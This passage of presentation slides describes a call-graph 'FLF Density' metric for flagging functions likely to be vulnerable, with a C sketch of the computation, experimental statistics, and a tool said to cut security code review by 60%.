    by function cardinality
  6. For each system choose the largest FLF Density
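
The steps above can be sketched on a small call graph. The slides do not give the exact formula, so this sketch makes several assumptions: the graph is an adjacency matrix, "path length" is the number of functions on the shortest call path from an Input to a Target, and the density is that length as a percentage of all functions. The names `path_functions` and `flf_density` are hypothetical.

```c
#define MAX_FUNCS 16

/* Number of functions on the shortest call path from src to dst,
 * or 0 if dst is unreachable. calls[i][j] != 0 means i calls j. */
static int path_functions(int calls[][MAX_FUNCS], int n, int src, int dst)
{
    int dist[MAX_FUNCS] = {0};      /* 0 marks "not visited yet" */
    int queue[MAX_FUNCS];
    int head = 0, tail = 0, i;

    dist[src] = 1;
    queue[tail++] = src;
    while (head < tail) {           /* breadth-first search */
        int u = queue[head++];
        if (u == dst)
            return dist[u];
        for (i = 0; i < n; i++) {
            if (calls[u][i] && dist[i] == 0) {
                dist[i] = dist[u] + 1;
                queue[tail++] = i;
            }
        }
    }
    return 0;
}

/* Largest path length over all Input/Target pairs, normalized by the
 * number of functions n and expressed as a percentage. */
double flf_density(int calls[][MAX_FUNCS], int n,
                   const int *inputs, int n_inputs,
                   const int *targets, int n_targets)
{
    double best = 0.0;
    int a, b;

    for (a = 0; a < n_inputs; a++) {
        for (b = 0; b < n_targets; b++) {
            int len = path_functions(calls, n, inputs[a], targets[b]);
            double density = 100.0 * len / n;
            if (density > best)
                best = density;
        }
    }
    return best;
}
```

For a four-function graph where function 0 calls 1 and 3, and 1 calls 2, an Input at 0 and a Target at 2 give a path of three functions, so this sketch reports 75.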

110
Experimental Results
111
Experimental Results
  • Sample mean FLF Density: 2.87%
  • Therefore, a very small number of functions are
    actually likely to be vulnerable
  • Standard deviation of 1.87%
  • The FLF density was consistent across our
    experimental systems
  • With 95% confidence the true mean is between
    2.23% and 3.51%
  • There is a high probability that our experimental
    density is close to the TRUE FLF Density

113
Verification
  • The FLF Density can be used as a conservative way
    to highlight likely vulnerable functions which
    do not have known vulnerabilities

115
FLF Finder
  • FLF Density can say what areas of code are
    statistically likely to be vulnerable
  • Automate a tool to find these areas
  • Targets are not provided: what do we do?
  • Assume all functions are targets
  • This extremely conservative assumption is still
    able to reduce the code to review by 60%!

116
Conclusion
  • There is credibility to the FLF hypothesis
  • FLF Finder can pinpoint those areas of code which
    are statistically likely to be vulnerable
  • 60% code reduction
  • This will greatly improve the efficiency of
    security code auditors!
  • Efficiency improvements make auditing more
    appealing to software developers